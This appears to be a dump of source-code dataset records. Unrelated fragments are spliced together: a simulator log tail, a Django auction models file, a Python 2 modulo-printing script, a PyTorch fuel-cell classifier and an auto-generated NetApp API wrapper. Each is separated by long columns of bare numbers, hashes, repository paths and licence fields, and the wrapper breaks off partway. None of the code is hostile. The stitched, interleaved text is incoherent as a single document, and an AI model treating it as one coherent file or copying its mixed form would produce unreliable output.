Loader0:mySubComp[1]:mySubCompSlot.numSent : Accumulator : Sum.u32 = 15; SumSQ.u32 = 15; Count.u64 = 15; Min.u32 = 1; Max.u32 = 1;
Loader1:mySubComp[0]:mySubCompSlot.numRecv : Accumulator : Sum.u32 = 15; SumSQ.u32 = 15; Count.u64 = 15; Min.u32 = 1; Max.u32 = 1;
Loader1:mySubComp[1]:mySubCompSlot.numRecv : Accumulator : Sum.u32 = 15; SumSQ.u32 = 15; Count.u64 = 15; Min.u32 = 1; Max.u32 = 1;
Simulation is complete, simulated time: 10 us
| 96.333333
| 132
| 0.686851
| 91
| 578
| 4.362637
| 0.263736
| 0.100756
| 0.171285
| 0.191436
| 0.816121
| 0.816121
| 0.816121
| 0.816121
| 0.816121
| 0.816121
| 0
| 0.168378
| 0.157439
| 578
| 5
| 133
| 115.6
| 0.646817
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
455ba300299cb8323b6985bbd61fc9385993e6e9
| 4,434
|
py
|
Python
|
auctions/models.py
|
mmanchev23/commerce
|
43d8a598b0032f1c21142ecd4c497aab0e61992e
|
[
"MIT"
] | 1
|
2021-07-18T20:44:14.000Z
|
2021-07-18T20:44:14.000Z
|
auctions/models.py
|
mmanchev23/commerce
|
43d8a598b0032f1c21142ecd4c497aab0e61992e
|
[
"MIT"
] | null | null | null |
auctions/models.py
|
mmanchev23/commerce
|
43d8a598b0032f1c21142ecd4c497aab0e61992e
|
[
"MIT"
] | null | null | null |
import uuid
from decimal import Decimal
from django.db import models
from django.contrib.auth.models import AbstractUser
from django.core.validators import MinValueValidator
class User(AbstractUser):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
pass
def __str__(self):
return str(self.username)
class Listing(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
user = models.ForeignKey(User, on_delete=models.CASCADE, default=None, null=True, blank=True)
title = models.CharField(max_length=100)
description = models.TextField()
price = models.DecimalField(max_digits=10, decimal_places=2, validators=[MinValueValidator(Decimal('0.00'))])
category = models.CharField(max_length=100)
image = models.ImageField(null=True, blank=True, default='default_auction_image.jpg', upload_to='images/')
created_at = models.DateTimeField(auto_now_add=True, editable=False)
updated_at = models.DateTimeField(auto_now=True, editable=False)
def __str__(self):
return str(self.title)
@property
def imageURL(self):
if self.image:
return self.image.url
else:
return "images/default_auction_image.jpg"
class Bid(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
user = models.ForeignKey(User, on_delete=models.CASCADE, default=None, null=True, blank=True)
listing = models.ForeignKey(Listing, on_delete=models.CASCADE, default=None, null=True, blank=True)
title = models.CharField(max_length=100)
bid = models.DecimalField(max_digits=10, decimal_places=2, validators=[MinValueValidator(Decimal('0.00'))])
created_at = models.DateTimeField(auto_now_add=True, editable=False)
updated_at = models.DateTimeField(auto_now=True, editable=False)
def __str__(self):
return str(self.title)
class Comment(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
user = models.ForeignKey(User, on_delete=models.CASCADE, default=None, null=True, blank=True)
listing = models.ForeignKey(Listing, on_delete=models.CASCADE, default=None, null=True, blank=True)
comment = models.TextField()
created_at = models.DateTimeField(auto_now_add=True, editable=False)
updated_at = models.DateTimeField(auto_now=True, editable=False)
def __str__(self):
return str(self.comment)
class Watchlist(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
user = models.ForeignKey(User, on_delete=models.CASCADE, default=None, null=True, blank=True)
listing = models.ForeignKey(Listing, on_delete=models.CASCADE, default=None, null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True, editable=False)
updated_at = models.DateTimeField(auto_now=True, editable=False)
def __str__(self):
return str(self.id)
class ClosedBid(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
user = models.ForeignKey(User, on_delete=models.CASCADE, default=None, null=True, blank=True)
winner = models.CharField(max_length=100)
listing = models.ForeignKey(Listing, on_delete=models.CASCADE, default=None, null=True, blank=True)
winprice = models.DecimalField(max_digits=10, decimal_places=2, validators=[MinValueValidator(Decimal('0.00'))])
created_at = models.DateTimeField(auto_now_add=True, editable=False)
updated_at = models.DateTimeField(auto_now=True, editable=False)
def __str__(self):
return str(self.id)
class AllListing(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
listing = models.ForeignKey(Listing, on_delete=models.CASCADE, default=None, null=True, blank=True)
title = models.CharField(max_length=100)
description = models.TextField()
image = models.ImageField(null=True, blank=True, default='default_auction_image.jpg', upload_to='images/')
created_at = models.DateTimeField(auto_now_add=True, editable=False)
updated_at = models.DateTimeField(auto_now=True, editable=False)
def __str__(self):
return str(self.title)
@property
def imageURL(self):
if self.image:
return self.image.url
else:
return "images/default_auction_image.jpg"
| 42.634615
| 116
| 0.736355
| 579
| 4,434
| 5.47323
| 0.139896
| 0.077943
| 0.049227
| 0.064374
| 0.903124
| 0.886084
| 0.878826
| 0.878826
| 0.878826
| 0.878826
| 0
| 0.010596
| 0.148624
| 4,434
| 103
| 117
| 43.048544
| 0.828874
| 0
| 0
| 0.740741
| 0
| 0
| 0.031574
| 0.02571
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0.012346
| 0.061728
| 0.08642
| 0.91358
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
45b4e8a5ad5895c2b7f9ac5e3698d7e41016cd77
| 882
|
py
|
Python
|
test/run/t458.py
|
timmartin/skulpt
|
2e3a3fbbaccc12baa29094a717ceec491a8a6750
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
test/run/t458.py
|
timmartin/skulpt
|
2e3a3fbbaccc12baa29094a717ceec491a8a6750
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
test/run/t458.py
|
timmartin/skulpt
|
2e3a3fbbaccc12baa29094a717ceec491a8a6750
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
print "0 % 10 =", 0 % 10
print "3 % 10 =", 3 % 10
print "6 % 10 =", 6 % 10
print "10 % 10 =", 10 % 10
print "14 % 10 =", 14 % 10
print "-3 % 10 =", -3 % 10
print "-6 % 10 =", -6 % 10
print "-10 % 10 =", -10 % 10
print "-14 % 10 =", -14 % 10
print "3.6 % 10 =", 3.6 % 10
print "-3.6 % 10 =", -3.6 % 10
print "35.9 % 10 =", 35.9 % 10
print "-35.9 % 10 =", -35.9 % 10
print "104 % 10 =", 104 % 10
print "-104 % 10 =", -104 % 10
print "0 % -10 =", 0 % -10
print "3 % -10 =", 3 % -10
print "6 % -10 =", 6 % -10
print "10 % -10 =", 10 % -10
print "14 % -10 =", 14 % -10
print "-3 % -10 =", -3 % -10
print "-6 % -10 =", -6 % -10
print "-10 % -10 =", -10 % -10
print "-14 % -10 =", -14 % -10
print "3.6 % -10 =", 3.6 % -10
print "-3.6 % -10 =", -3.6 % -10
print "35.9 % -10 =", 35.9 % -10
print "-35.9 % -10 =", -35.9 % -10
print "104 % -10 =", 104 % -10
print "-104 % -10 =", -104 % -10
| 26.727273
| 34
| 0.437642
| 166
| 882
| 2.325301
| 0.054217
| 0.525907
| 0.165803
| 0.103627
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.36875
| 0.274376
| 882
| 32
| 35
| 27.5625
| 0.234375
| 0
| 0
| 0
| 0
| 0
| 0.346198
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
45c40cbba7fbf4153cd88078872458c8be136c0d
| 2,071
|
py
|
Python
|
model.py
|
Shangwei-ZHOU/Fuel_Cell_Diagnosis
|
65aee8803dc0ef7e9cae54f104c5b5cca823d2b9
|
[
"MIT"
] | null | null | null |
model.py
|
Shangwei-ZHOU/Fuel_Cell_Diagnosis
|
65aee8803dc0ef7e9cae54f104c5b5cca823d2b9
|
[
"MIT"
] | null | null | null |
model.py
|
Shangwei-ZHOU/Fuel_Cell_Diagnosis
|
65aee8803dc0ef7e9cae54f104c5b5cca823d2b9
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import torch.nn.functional as F
input_number=100
class Fuel_Cell_Net_16800(nn.Module):
def __init__(self):
super(Fuel_Cell_Net_16800,self).__init__()
self.conv1 = nn.Conv1d(1, 64, 100, 10)
self.pool1 = nn.MaxPool1d(3, 2)
self.conv2 = nn.Conv1d(64, 32, 5, 10)
self.pool2 = nn.MaxPool1d(2, 2)
self.fc1 = nn.Linear(32 * 42, 512)
self.fc2 = nn.Linear(512, 64)
self.fc3 = nn.Linear(64, 3)
def forward(self,x):
x = F.relu(self.conv1(x))
x = self.pool1(x)
x = F.relu(self.conv2(x))
x = self.pool2(x)
x = x.view(-1, 32 * 42)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
class Fuel_Cell_Net_40000(nn.Module):
def __init__(self):
super(Fuel_Cell_Net_40000,self).__init__()
self.conv1=nn.Conv1d(1,64,100,10)
self.pool1 = nn.MaxPool1d(3, 2)
self.conv2 = nn.Conv1d(64, 32, 5,10)
self.pool2=nn.MaxPool1d(2,2)
self.fc1=nn.Linear(32*100,512)
self.fc2=nn.Linear(512,64)
self.fc3 = nn.Linear(64, 3)
def forward(self,x):
x=F.relu(self.conv1(x))
x = self.pool1(x)
x = F.relu(self.conv2(x))
x=self.pool2(x)
x=x.view(-1,32*100)
x=F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x=self.fc3(x)
return x
class Fuel_Cell_Net_10001(nn.Module):
def __init__(self):
super(Fuel_Cell_Net_10001,self).__init__()
self.conv1=nn.Conv1d(1,32,101,10)
self.pool1 = nn.MaxPool1d(3, 2)
self.conv2 = nn.Conv1d(32, 16, 5,10)
self.pool2=nn.MaxPool1d(2,2)
self.fc1=nn.Linear(16*25,256)
self.fc2=nn.Linear(256,64)
self.fc3 = nn.Linear(64, 3)
def forward(self,x):
x=F.relu(self.conv1(x))
x = self.pool1(x)
x = F.relu(self.conv2(x))
x=self.pool2(x)
x=x.view(-1,16*25)
x=F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x=self.fc3(x)
return x
| 30.910448
| 50
| 0.550459
| 350
| 2,071
| 3.134286
| 0.14
| 0.043756
| 0.065634
| 0.109389
| 0.862352
| 0.862352
| 0.862352
| 0.838651
| 0.838651
| 0.742935
| 0
| 0.139472
| 0.286818
| 2,071
| 66
| 51
| 31.378788
| 0.60325
| 0
| 0
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.031746
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2fb50e5b4764ca01181bd15c01a6ba221e3d8926
| 181,311
|
py
|
Python
|
library/netapp-manageability-sdk-5.6/lib/python/NetApp/netapp_utils.py
|
Italux/python-mdszoning
|
e9126e5ee1f64105577db4afa74de33db88a80bf
|
[
"Apache-2.0"
] | null | null | null |
library/netapp-manageability-sdk-5.6/lib/python/NetApp/netapp_utils.py
|
Italux/python-mdszoning
|
e9126e5ee1f64105577db4afa74de33db88a80bf
|
[
"Apache-2.0"
] | 2
|
2022-03-23T20:22:14.000Z
|
2022-03-23T20:23:09.000Z
|
library/netapp-manageability-sdk-5.6/lib/python/NetApp/netapp_utils.py
|
italux/python-mdszoning
|
e9126e5ee1f64105577db4afa74de33db88a80bf
|
[
"Apache-2.0"
] | null | null | null |
############################################################################
# This module was auto-generated on Thu Oct 13 19:24:39 2016
# by using the 'system-api-list' api call from NetApp SDK for python.
# If you make changes to this module it will likely be broken the next time
# this file is auto-generated. If you choose to update this file anyway,
# please ensure that you have also updated the generate-api.py script
# to include your new changes.
#
# Also worth mentioning that some of the api calls may not work properly
# and that is because there is no way to easily auto-determine what api
# calls require additional arguments. If you find one that is broken,
# you may need to manually update this file but that is not recommended.
#
# The goal of this module is to make it easier to develop code since the
# original API requires you to know the exact API calls for interating
# with your NetApp appliance. The other goal of this module is to ensure
# you can override it instaed of modifying it directly if you find problems.
############################################################################
import sys
from NaElement import *
from NaServer import *
import xmltodict
import unicodedata
conn = None
timeout = 10
def connect(hostname, user, password, minor_version=1, major_version=21):
global conn
conn = NaServer(hostname, minor_version, major_version)
conn.set_server_type('filer')
conn.set_transport_type('HTTP')
conn.set_port(80)
conn.set_style('LOGIN')
conn.set_admin_user(user, password)
conn.set_timeout(timeout)
return conn
def action_test_key_optionality_defaultaction(*args):
api_call = _invoke_api('action-test-key-optionality-defaultaction', *args)
return api_call
def active_directory_account_get_iter(*args):
api_call = _invoke_api('active-directory-account-get-iter', *args)
return api_call
def aggr_add(*args):
api_call = _invoke_api('aggr-add', *args)
return api_call
def aggr_autobalance_aggregate_state_get_iter(*args):
api_call = _invoke_api('aggr-autobalance-aggregate-state-get-iter', *args)
return api_call
def aggr_autobalance_config_get(*args):
api_call = _invoke_api('aggr-autobalance-config-get', *args)
return api_call
def aggr_autobalance_config_modify(*args):
api_call = _invoke_api('aggr-autobalance-config-modify', *args)
return api_call
def aggr_autobalance_notification_get_iter(*args):
api_call = _invoke_api('aggr-autobalance-notification-get-iter', *args)
return api_call
def aggr_autobalance_volume_state_get_iter(*args):
api_call = _invoke_api('aggr-autobalance-volume-state-get-iter', *args)
return api_call
def aggr_check_spare_low(*args):
api_call = _invoke_api('aggr-check-spare-low', *args)
return api_call
def aggr_create(*args):
api_call = _invoke_api('aggr-create', *args)
return api_call
def aggr_destroy(*args):
api_call = _invoke_api('aggr-destroy', *args)
return api_call
def aggr_get_filer_info(*args):
api_call = _invoke_api('aggr-get-filer-info', *args)
return api_call
def aggr_get_iter(*args):
api_call = _invoke_api('aggr-get-iter', *args)
return api_call
def aggr_layout_recommendation_get_iter(*args):
api_call = _invoke_api('aggr-layout-recommendation-get-iter', *args)
return api_call
def aggr_mirror(*args):
api_call = _invoke_api('aggr-mirror', *args)
return api_call
def aggr_modify_raid_type(*args):
api_call = _invoke_api('aggr-modify-raid-type', *args)
return api_call
def aggr_offline(*args):
api_call = _invoke_api('aggr-offline', *args)
return api_call
def aggr_online(*args):
api_call = _invoke_api('aggr-online', *args)
return api_call
def aggr_options_list_info(*args):
api_call = _invoke_api('aggr-options-list-info', *args)
return api_call
def aggr_relocation(*args):
api_call = _invoke_api('aggr-relocation', *args)
return api_call
def aggr_relocation_status(*args):
api_call = _invoke_api('aggr-relocation-status', *args)
return api_call
def aggr_remove_stale_record(*args):
api_call = _invoke_api('aggr-remove-stale-record', *args)
return api_call
def aggr_rename(*args):
api_call = _invoke_api('aggr-rename', *args)
return api_call
def aggr_restrict(*args):
api_call = _invoke_api('aggr-restrict', *args)
return api_call
def aggr_scrub_list_info(*args):
api_call = _invoke_api('aggr-scrub-list-info', *args)
return api_call
def aggr_scrub_resume(*args):
api_call = _invoke_api('aggr-scrub-resume', *args)
return api_call
def aggr_scrub_start(*args):
api_call = _invoke_api('aggr-scrub-start', *args)
return api_call
def aggr_scrub_stop(*args):
api_call = _invoke_api('aggr-scrub-stop', *args)
return api_call
def aggr_scrub_suspend(*args):
api_call = _invoke_api('aggr-scrub-suspend', *args)
return api_call
def aggr_set_option(*args):
api_call = _invoke_api('aggr-set-option', *args)
return api_call
def aggr_space_get_iter(*args):
api_call = _invoke_api('aggr-space-get-iter', *args)
return api_call
def aggr_spare_get_iter(*args):
api_call = _invoke_api('aggr-spare-get-iter', *args)
return api_call
def aggr_status_get_iter(*args):
api_call = _invoke_api('aggr-status-get-iter', *args)
return api_call
def aggr_verify_list_info(*args):
api_call = _invoke_api('aggr-verify-list-info', *args)
return api_call
def aggr_verify_resume(*args):
api_call = _invoke_api('aggr-verify-resume', *args)
return api_call
def aggr_verify_start(*args):
api_call = _invoke_api('aggr-verify-start', *args)
return api_call
def aggr_verify_stop(*args):
api_call = _invoke_api('aggr-verify-stop', *args)
return api_call
def aggr_verify_suspend(*args):
api_call = _invoke_api('aggr-verify-suspend', *args)
return api_call
def alternate_destroy_iter_1(*args):
api_call = _invoke_api('alternate-destroy-iter-1', *args)
return api_call
def alternate_destroy_iter_1_inout(*args):
api_call = _invoke_api('alternate-destroy-iter-1-inout', *args)
return api_call
def alternate_get_1(*args):
api_call = _invoke_api('alternate-get-1', *args)
return api_call
def alternate_get_1_inout(*args):
api_call = _invoke_api('alternate-get-1-inout', *args)
return api_call
def alternate_get_iter_1(*args):
api_call = _invoke_api('alternate-get-iter-1', *args)
return api_call
def alternate_get_iter_1_inout(*args):
api_call = _invoke_api('alternate-get-iter-1-inout', *args)
return api_call
def alternate_get_iter_2(*args):
api_call = _invoke_api('alternate-get-iter-2', *args)
return api_call
def alternate_get_iter_2_inout(*args):
api_call = _invoke_api('alternate-get-iter-2-inout', *args)
return api_call
def alternate_modify_iter(*args):
api_call = _invoke_api('alternate-modify-iter', *args)
return api_call
def alternate_modify_iter_inout(*args):
api_call = _invoke_api('alternate-modify-iter-inout', *args)
return api_call
def antivirus_modify(*args):
api_call = _invoke_api('antivirus-modify', *args)
return api_call
def audit_get(*args):
api_call = _invoke_api('audit-get', *args)
return api_call
def audit_modify(*args):
api_call = _invoke_api('audit-modify', *args)
return api_call
def autogenzapi_create(*args):
api_call = _invoke_api('autogenzapi-create', *args)
return api_call
def autogenzapi_destroy(*args):
api_call = _invoke_api('autogenzapi-destroy', *args)
return api_call
def autogenzapi_get_iter(*args):
api_call = _invoke_api('autogenzapi-get-iter', *args)
return api_call
def autogenzapi_modify(*args):
api_call = _invoke_api('autogenzapi-modify', *args)
return api_call
def autogenzapi2_get_iter(*args):
api_call = _invoke_api('autogenzapi2-get-iter', *args)
return api_call
def autogenzapi3_create(*args):
api_call = _invoke_api('autogenzapi3-create', *args)
return api_call
def autogenzapi3_destroy(*args):
api_call = _invoke_api('autogenzapi3-destroy', *args)
return api_call
def autogenzapi3_get_iter(*args):
api_call = _invoke_api('autogenzapi3-get-iter', *args)
return api_call
def autogenzapi3_method1(*args):
api_call = _invoke_api('autogenzapi3-method1', *args)
return api_call
def autogenzapi3_modify(*args):
api_call = _invoke_api('autogenzapi3-modify', *args)
return api_call
def autogenzapiaction_dummy_autozapi_action_cmd(*args):
api_call = _invoke_api('autogenzapiaction-dummy-autozapi-action-cmd', *args)
return api_call
def autosupport_budget_get(*args):
api_call = _invoke_api('autosupport-budget-get', *args)
return api_call
def autosupport_budget_get_iter(*args):
api_call = _invoke_api('autosupport-budget-get-iter', *args)
return api_call
def autosupport_budget_get_total_records(*args):
api_call = _invoke_api('autosupport-budget-get-total-records', *args)
return api_call
def autosupport_budget_modify(*args):
api_call = _invoke_api('autosupport-budget-modify', *args)
return api_call
def autosupport_check_connectivity(*args):
api_call = _invoke_api('autosupport-check-connectivity', *args)
return api_call
def autosupport_check_connectivity_iter(*args):
api_call = _invoke_api('autosupport-check-connectivity-iter', *args)
return api_call
def autosupport_check_iter(*args):
api_call = _invoke_api('autosupport-check-iter', *args)
return api_call
def autosupport_compliant_get(*args):
api_call = _invoke_api('autosupport-compliant-get', *args)
return api_call
def autosupport_compliant_get_iter(*args):
api_call = _invoke_api('autosupport-compliant-get-iter', *args)
return api_call
def autosupport_compliant_get_total_records(*args):
api_call = _invoke_api('autosupport-compliant-get-total-records', *args)
return api_call
def autosupport_config_get(*args):
api_call = _invoke_api('autosupport-config-get', *args)
return api_call
def autosupport_config_get_iter(*args):
api_call = _invoke_api('autosupport-config-get-iter', *args)
return api_call
def autosupport_config_get_total_records(*args):
api_call = _invoke_api('autosupport-config-get-total-records', *args)
return api_call
def autosupport_config_modify(*args):
api_call = _invoke_api('autosupport-config-modify', *args)
return api_call
def autosupport_destinations_get(*args):
api_call = _invoke_api('autosupport-destinations-get', *args)
return api_call
def autosupport_destinations_get_iter(*args):
api_call = _invoke_api('autosupport-destinations-get-iter', *args)
return api_call
def autosupport_destinations_get_total_records(*args):
api_call = _invoke_api('autosupport-destinations-get-total-records', *args)
return api_call
def autosupport_download_get(*args):
api_call = _invoke_api('autosupport-download-get', *args)
return api_call
def autosupport_download_get_iter(*args):
api_call = _invoke_api('autosupport-download-get-iter', *args)
return api_call
def autosupport_history_cancel(*args):
api_call = _invoke_api('autosupport-history-cancel', *args)
return api_call
def autosupport_history_get(*args):
api_call = _invoke_api('autosupport-history-get', *args)
return api_call
def autosupport_history_get_iter(*args):
api_call = _invoke_api('autosupport-history-get-iter', *args)
return api_call
def autosupport_history_get_total_records(*args):
api_call = _invoke_api('autosupport-history-get-total-records', *args)
return api_call
def autosupport_history_retransmit(*args):
api_call = _invoke_api('autosupport-history-retransmit', *args)
return api_call
def autosupport_invoke(*args):
api_call = _invoke_api('autosupport-invoke', *args)
return api_call
def autosupport_invoke_core_upload(*args):
api_call = _invoke_api('autosupport-invoke-core-upload', *args)
return api_call
def autosupport_invoke_diagnostic(*args):
api_call = _invoke_api('autosupport-invoke-diagnostic', *args)
return api_call
def autosupport_invoke_performance_archive(*args):
api_call = _invoke_api('autosupport-invoke-performance-archive', *args)
return api_call
def autosupport_invoke_splog(*args):
api_call = _invoke_api('autosupport-invoke-splog', *args)
return api_call
def autosupport_manifest_get_iter(*args):
api_call = _invoke_api('autosupport-manifest-get-iter', *args)
return api_call
def autosupport_manifest_get_total_records(*args):
api_call = _invoke_api('autosupport-manifest-get-total-records', *args)
return api_call
def autosupport_trigger_get(*args):
api_call = _invoke_api('autosupport-trigger-get', *args)
return api_call
def autosupport_trigger_get_iter(*args):
api_call = _invoke_api('autosupport-trigger-get-iter', *args)
return api_call
def autosupport_trigger_get_total_records(*args):
api_call = _invoke_api('autosupport-trigger-get-total-records', *args)
return api_call
def autosupport_trigger_modify(*args):
api_call = _invoke_api('autosupport-trigger-modify', *args)
return api_call
def autozapiview_get_iter(*args):
api_call = _invoke_api('autozapiview-get-iter', *args)
return api_call
def av_get_engine_info(*args):
api_call = _invoke_api('av-get-engine-info', *args)
return api_call
def av_get_engine_options(*args):
api_call = _invoke_api('av-get-engine-options', *args)
return api_call
def av_get_log(*args):
api_call = _invoke_api('av-get-log', *args)
return api_call
def av_get_remedy_info(*args):
api_call = _invoke_api('av-get-remedy-info', *args)
return api_call
def av_get_version_info(*args):
api_call = _invoke_api('av-get-version-info', *args)
return api_call
def av_log_iter(*args):
api_call = _invoke_api('av-log-iter', *args)
return api_call
def av_on_access_policy_get_iter(*args):
api_call = _invoke_api('av-on-access-policy-get-iter', *args)
return api_call
def av_on_demand_command_abort(*args):
api_call = _invoke_api('av-on-demand-command-abort', *args)
return api_call
def av_on_demand_command_run(*args):
api_call = _invoke_api('av-on-demand-command-run', *args)
return api_call
def av_on_demand_command_scan_cluster_create(*args):
api_call = _invoke_api('av-on-demand-command-scan-cluster-create', *args)
return api_call
def av_on_demand_command_scan_cluster_delete(*args):
api_call = _invoke_api('av-on-demand-command-scan-cluster-delete', *args)
return api_call
def av_on_demand_command_scan_cluster_get(*args):
api_call = _invoke_api('av-on-demand-command-scan-cluster-get', *args)
return api_call
def av_on_demand_command_scan_cluster_get_iter(*args):
api_call = _invoke_api('av-on-demand-command-scan-cluster-get-iter', *args)
return api_call
def av_on_demand_command_scan_cluster_modify(*args):
api_call = _invoke_api('av-on-demand-command-scan-cluster-modify', *args)
return api_call
def av_on_demand_command_scan_dir_get_iter(*args):
api_call = _invoke_api('av-on-demand-command-scan-dir-get-iter', *args)
return api_call
def av_on_demand_command_scan_file_get_iter(*args):
api_call = _invoke_api('av-on-demand-command-scan-file-get-iter', *args)
return api_call
def av_on_demand_command_scan_vserver_get_iter(*args):
api_call = _invoke_api('av-on-demand-command-scan-vserver-get-iter', *args)
return api_call
def av_on_demand_command_schedule(*args):
api_call = _invoke_api('av-on-demand-command-schedule', *args)
return api_call
def av_on_demand_command_unschedule(*args):
api_call = _invoke_api('av-on-demand-command-unschedule', *args)
return api_call
def av_on_demand_job_get_iter(*args):
api_call = _invoke_api('av-on-demand-job-get-iter', *args)
return api_call
def av_on_demand_report_get_iter(*args):
api_call = _invoke_api('av-on-demand-report-get-iter', *args)
return api_call
def av_on_demand_report_print(*args):
api_call = _invoke_api('av-on-demand-report-print', *args)
return api_call
def av_on_demand_report_upload(*args):
api_call = _invoke_api('av-on-demand-report-upload', *args)
return api_call
def av_set_engine_info(*args):
api_call = _invoke_api('av-set-engine-info', *args)
return api_call
def av_set_engine_options(*args):
api_call = _invoke_api('av-set-engine-options', *args)
return api_call
def av_set_log(*args):
api_call = _invoke_api('av-set-log', *args)
return api_call
def av_set_remedy_info(*args):
api_call = _invoke_api('av-set-remedy-info', *args)
return api_call
def av_set_version_info(*args):
api_call = _invoke_api('av-set-version-info', *args)
return api_call
def av_start_update(*args):
api_call = _invoke_api('av-start-update', *args)
return api_call
def capability_can_be_enabled(*args):
api_call = _invoke_api('capability-can-be-enabled', *args)
return api_call
def capability_can_be_enabled_shim(*args):
api_call = _invoke_api('capability-can-be-enabled-shim', *args)
return api_call
def capability_can_boot_shim(*args):
api_call = _invoke_api('capability-can-boot-shim', *args)
return api_call
def capability_can_join_shim(*args):
api_call = _invoke_api('capability-can-join-shim', *args)
return api_call
def capability_disable(*args):
api_call = _invoke_api('capability-disable', *args)
return api_call
def capability_downgrade_commit_shim(*args):
api_call = _invoke_api('capability-downgrade-commit-shim', *args)
return api_call
def capability_downgrade_prepare_shim(*args):
api_call = _invoke_api('capability-downgrade-prepare-shim', *args)
return api_call
def capability_enable(*args):
api_call = _invoke_api('capability-enable', *args)
return api_call
def capability_get(*args):
api_call = _invoke_api('capability-get', *args)
return api_call
def capability_get_cluster_set(*args):
api_call = _invoke_api('capability-get-cluster-set', *args)
return api_call
def capability_get_iter(*args):
api_call = _invoke_api('capability-get-iter', *args)
return api_call
def capability_is_enabled(*args):
api_call = _invoke_api('capability-is-enabled', *args)
return api_call
def capability_is_enabled_during_downgrade_shim(*args):
api_call = _invoke_api('capability-is-enabled-during-downgrade-shim', *args)
return api_call
def capability_is_local_node_enable_ready(*args):
api_call = _invoke_api('capability-is-local-node-enable-ready', *args)
return api_call
def capability_load_manifest_shim(*args):
api_call = _invoke_api('capability-load-manifest-shim', *args)
return api_call
def capability_mark_local_node_enable_ready(*args):
api_call = _invoke_api('capability-mark-local-node-enable-ready', *args)
return api_call
def capability_node_disable(*args):
api_call = _invoke_api('capability-node-disable', *args)
return api_call
def capability_node_enable(*args):
api_call = _invoke_api('capability-node-enable', *args)
return api_call
def capability_node_has_capability(*args):
api_call = _invoke_api('capability-node-has-capability', *args)
return api_call
def capability_node_is_enabled(*args):
api_call = _invoke_api('capability-node-is-enabled', *args)
return api_call
def capability_recommend_release_shim(*args):
api_call = _invoke_api('capability-recommend-release-shim', *args)
return api_call
def capability_replicate_manifest_for_join_shim(*args):
api_call = _invoke_api('capability-replicate-manifest-for-join-shim', *args)
return api_call
def capability_software_update_check_shim(*args):
api_call = _invoke_api('capability-software-update-check-shim', *args)
return api_call
def cf_aggregate_giveback_status(*args):
api_call = _invoke_api('cf-aggregate-giveback-status', *args)
return api_call
def cf_force_takeover(*args):
api_call = _invoke_api('cf-force-takeover', *args)
return api_call
def cf_get_iter(*args):
api_call = _invoke_api('cf-get-iter', *args)
return api_call
def cf_get_partner(*args):
api_call = _invoke_api('cf-get-partner', *args)
return api_call
def cf_giveback(*args):
api_call = _invoke_api('cf-giveback', *args)
return api_call
def cf_hwassist_stats(*args):
api_call = _invoke_api('cf-hwassist-stats', *args)
return api_call
def cf_hwassist_stats_clear(*args):
api_call = _invoke_api('cf-hwassist-stats-clear', *args)
return api_call
def cf_hwassist_status(*args):
api_call = _invoke_api('cf-hwassist-status', *args)
return api_call
def cf_hwassist_test(*args):
api_call = _invoke_api('cf-hwassist-test', *args)
return api_call
def cf_mode_set(*args):
api_call = _invoke_api('cf-mode-set', *args)
return api_call
def cf_modify_iter(*args):
api_call = _invoke_api('cf-modify-iter', *args)
return api_call
def cf_service_disable(*args):
api_call = _invoke_api('cf-service-disable', *args)
return api_call
def cf_service_enable(*args):
api_call = _invoke_api('cf-service-enable', *args)
return api_call
def cf_status(*args):
api_call = _invoke_api('cf-status', *args)
return api_call
def cf_takeover(*args):
api_call = _invoke_api('cf-takeover', *args)
return api_call
def cf_takeover_status(*args):
api_call = _invoke_api('cf-takeover-status', *args)
return api_call
def cifs_branchcache_get_iter(*args):
api_call = _invoke_api('cifs-branchcache-get-iter', *args)
return api_call
